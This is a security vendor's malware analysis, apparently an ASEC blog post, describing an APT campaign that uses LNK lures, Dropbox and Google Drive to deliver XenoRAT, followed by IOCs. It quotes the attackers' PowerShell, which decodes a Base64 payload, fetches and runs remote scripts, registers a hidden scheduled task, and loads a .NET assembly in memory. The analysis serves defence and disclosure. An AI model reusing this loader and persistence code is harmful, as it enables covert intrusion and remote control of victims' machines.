APT Attacks Leveraging Cloud Storage

AhnLab SEcurity intelligence Center (ASEC) has been sharing cases of attacks in which threat actors utilize cloud services such as Google Drive, OneDrive, and Dropbox to collect user information or distribute malware. [1][2][3] The threat actors mainly upload malicious scripts, RAT malware strains, and decoy documents onto the cloud servers to perform attacks. The uploaded files work systematically and perform various malicious behaviors.

The process from the first distribution file to the execution of RAT malware is as follows:

Figure 1. Operation process

In such attack type, multiple files are connected as seen in Figure 1, and they all operate via the threat actor’s cloud. As such, malware strains not confirmed in the article may be downloaded or various malicious behaviors such as leaking information may be performed.

EXE and shortcut files (*.LNK) were the first files to be distributed, and this article will explain the operation process through an LNK file, a file type that is frequently used in APT attacks.

1. Distributed File (Shortcut File (*.LNK))

The confirmed LNK file is disguised as an HTML document file as seen below and has a name that lures users to click it.

  • Police Cyber Investigation Bureau – Internet Use History (check now to keep your PC safe).html.lnk
Figure 2. LNK properties

The LNK file contains PowerShell commands. The file decodes Base64-encoded commands after being run and executes the commands after saving them as the ms_temp_08.ps1 file inside the TEMP folder.

........WINDOWSsystem32WindowsPowerShellv1.0powershell.exe
"$ss ="[Base64-encoded commands]";
$aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));
$cc = [System.IO.Path]::GetTempPath();
$dd = "ms_temp_08.ps1";
$ee = Join-Path $cc $dd;
$aa | Out-File -FilePath $ee;
$aaaaa= 89897878;
powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"
  • ms_temp_08.ps1

ms_temp_08.ps1 downloads decoy documents and additional files and registers them to the Task Scheduler after being created. The following PowerShell commands are executed:

$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "Police Cyber Investigation Bureau - Internet Use History (check now to keep your PC safe).html";
Invoke-WebRequest -Uri "hxxps://dl.dropboxusercontent[.]com/scl/fi/lpoo2f42y7x5uy6druxa0/SoJ****.html?rlkey=ckv37q02rh9j1qsw7ed28bimv&st=64zsdvba&dl=0" -OutFile $hhh; & $hhh;
$filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_update.ps1";
$str = '$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "info.ps1"; Invoke-WebRequest -Uri "hxxps://dl.dropboxusercontent[.]com/scl/fi/9d9msk907asjhilhjr75m/SoJ****-X.txt?rlkey=f8rydbv8tf28i9f2fwkrux6wo&st=78byjswv&dl=0" -OutFile $aaa; & $aaa;';
$str | Out-File -FilePath $filePath -Encoding UTF8;
$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop  -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_update.ps1";powershell -windowstyle hidden -ExecutionPolicy Bypass -File $filePath;}"';
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30);
$settings = New-ScheduledTaskSettingsSet -Hidden;
Register-ScheduledTask -TaskName "MicrosoftUpdate" -Action $action -Trigger $trigger -Settings $settings;
$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "first.ps1";
Invoke-WebRequest -Uri "hxxps://dl.dropboxusercontent[.]com/scl/fi/gswgcmbktt1hthntozgep/SoJ****-F.txt?rlkey=n9xglo02xfnf14b9btgtw8aqi&st=w9zt1es5&dl=0" -OutFile $aaa; & $aaa;

The PowerShell commands firstly download the decoy document file (normal HTML file). The downloaded file is saved and executed as “Police Cyber Investigation Bureau – Internet Use History (check now to keep your PC safe).html”, making it difficult for users to realize that malicious behaviors are taking place as the file name is the same as that of the LNK file. The ASEC team was unable to check the file’s content because it could not be downloaded at the time of analysis.

After the above process, a PowerShell script file named ms_update.ps1 is created in the TEMP folder and registered to the Task Scheduler as MicrosoftUpdate so that it is run every 30 minutes.

Figure 3. The list of registered tasks

Additionally, a file named SoJ****-F.txt is downloaded from the threat actor’s Dropbox and saved into the TEMP folder as first.ps1 to be executed.

  • ms_update.ps1

As mentioned earlier, this script file downloads a file named SoJ****-F.txt from the threat actor’s Dropbox and saves it into the TEMP folder as info.ps1 to be executed.

$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "info.ps1";
Invoke-WebRequest -Uri "hxxps://dl.dropboxusercontent[.]com/scl/fi/9d9msk907asjhilhjr75m/So****g-X.txt?rlkey=f8rydbv8tf28i9f2fwkrux6wo&st=78byjswv&dl=0" -OutFile $aaa; & $aaa;

During the analysis, the team confirmed that the threat actor’s Dropbox contains decoy documents in various formats such as HTML, Word document, HWP (Hangul Word Processor) document, and PDF. The following decoy documents were found subsequently.

Figure 4. Additionally found decoy document (1)
Figure 5. Additionally found decoy document (2)
Figure 6. Additionally found decoy document (3)
Figure 7. Additionally found decoy document (4)

As seen from the screenshots above, the threat actor owns documents of various themes. Some of the documents found additionally are university cooperation requests, business delivery confirmations, and documents related to foreign affairs. Given that the threat actor also uses files disguised as documents such as money deposit contracts, insurance, and loans that include the personal information of specific individuals, it appears that they distribute malware to specific designated targets.

2. Malware Downloaded via Cloud

The aforementioned LNK file downloads first.ps1(SoJ****-F.txt) and info.ps1(SoJ****-X.txt) files from the threat actor’s cloud. The files could not be downloaded from the Dropbox mentioned above at the time of analysis, but the team collected such script files from another Dropbox in the threat actor’s possession.

The uploaded script files are named after certain individuals, hinting that the threat actor carried out different malicious behaviors for each of them. The names of the additionally discovered files are as follows:

File Name
SoJ***g-F.txt
Kim***un-F.txt
I***ong-F.txt
Hong***a-F.txt
Jon***n-F.txt
0513chrome-f.txt
0514edge-f.txt
Table 1. Confirmed script file names

The threat actor created a folder for each user, and each contained a decoy document, [name]-F.txt, and [name]-X.txt files. The script files all use the token-based authentication method for the authentication of Dropbox, and each file contains client_id, client_secret, and refresh_token values.

Below is the analysis information for each type.

  • first.ps1(SoJ****-F.txt)

This is a script file that contains PowerShell commands. Once launched, it collects the user’s PC information and uploads it onto the threat actor’s Dropbox.

Upon execution, it collects the user’s PC information and saves it into TEMP or APPDATA folder as [IP Address]-[Current Time]-Run-[name].txt (or [IP Address]-[Current Time]-RRR-[name].txt). The list below shows which pieces of information are collected.

  1. Information about OS Caption, Version, BuildNumber, and OSArchitecture
  2. Information about the installed anti-malware solution
  3. Last boot time
  4. PC type (Laptop/Desktop)
  5. Process information
  6. Information about the PowerShell execution policy

The information collected afterward is uploaded onto the threat actor’s Dropbox as [IP Address]-[Current Time]-Run-[name].txt (or [IP Address]-[Current Time]-RRR-[name].txt).

Figure 8. Leaked PC information
  • info.ps1(SoJ****-X.txt)

This is a script file that contains PowerShell commands, and once launched, it uploads certain files onto the threat actor’s Dropbox and downloads additional malware strains to launch them.

It creates [IP Address]-[Current Time]-XXX-[name].txt file inside TEMP or APPDATA folder and uploads it onto Dropbox without changing the name. The file did not save any data at the time of analysis, and its purpose is thought to check if the script was executed. However, if the threat actor modifies the script code in the future, it may collect and leak various types of information.

After uploading the file, it downloads additional malware strains using Google Drive instead of Dropbox. The files downloaded through Google Drive are saved in the TEMP folder and have system-xn.dat in their names.

$dropboxShareLink = "hxxps://drive.google.com/uc?export=download&id=[omitted]"


$tempPath = [System.IO.Path]::GetTempPath();
$filePath = Join-Path $tempPath "system-xn.dat"
Invoke-WebRequest -Uri $dropboxShareLink -OutFile $filePath

[byte[]]$bytes = [System.IO.File]::ReadAllBytes($filePath);
$bytes[0] = 0x1F;
$bytes[1] = 0x8B;
<omitted>
$assembly = [System.Reflection.Assembly]::Load($exBytes);

Remove-Item -Path $filePath

$name = "Main";
foreach ($type in $assembly.GetTypes()){foreach ($method in $type.GetMethods()){if (($method.Name.ToLower()).equals($name.ToLower())){$method.Invoke($null, @());}}}

The threat actor changed the front part of the file (file signature) as shown below so that it looks like an RTF document format.

Figure 9. The malware with the changed front part (file signature)

The compressed file can be checked after changing the altered 7 bytes to the GZ compressed file’s file signature, the value confirmed in the script above.

Figure 10. Additional compressed malware

The decompressed data is a C# (.NET) file, and the threat actor calls the inner “Main” Method and runs the file so that the malware can be executed in a fileless format.

  • system-xn.dat

The malware that is launched through the above process is XenoRAT which can perform various malicious behaviors such as loading malware, launching and terminating processes, and communicating with the C2 server based on the threat actor’s commands. It is customized by the threat actor and uses “swolf-20010512” as the mutex name.

C2: 159.100.29[.]122:8811

Figure 11. Part of XenoRAT’s code

The following email addresses of the threat actor were confirmed during the analysis:

  • kumasancar@gmail[.]com
  • effortnully@gmail[.]com
  • tangdang77790@gmail[.]com
  • tantanibox@gmail[.]com
  • swolf0512@gmail[.]com

As explained earlier, the threat actor’s cloud contains multiple decoy document files that store personal information. The threat actor appears to set the attack targets in advance and distribute malware after continuously collecting relevant information. Users are advised to take extra caution as when malware strains are run, they not only leak information and download additional malware strains but also perform malicious activities such as controlling the affected system. Additionally, users must check if a file’s extension and format match before running it as the team has recently found multiple malware strains that utilize shortcut files.

File Detection
Downloader/LNK.Powershell.S2547 (2024.04.12.03)
Trojan/PowerShell.Generic (2024.05.14.03)
Backdoor/Win.XenoRAT.R644842 (2024.04.12.02)
Backdoor/Win.XenoRAT.R644844 (2024.04.12.02)

IOCs

MD5s
c45d209f666f77d70bed61e6fca48bc2 (LNK)
52e5d2cd15ea7d0928e90b18039ec6c6 (SCRIPT)
f396bf5ff64656b592fe3d665eab8aa3 (SCRIPT)
dd2988c792b0252db4c39309e6cb2c48 (SCRIPT)
66b5ffb611505f0067c868dfa84aea60 (SCRIPT)
d9d9b8375f74812c41a1cd9abce25ac9 (SCRIPT)
5d2fdc098d1e1a7674a40ef9140058ed (SCRIPT)
bcb0a6360f057475c63fb16e61fb3adc (SCRIPT)
6ad00d48fdce8dc632b13f6c2438f893 (SCRIPT)
238cd8f609b06258ab8b4ded82ebbff8 (XenoRAT)

C&C
159.100.29[.]122:8811

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post APT Attacks Using Cloud Storage appeared first on ASEC BLOG.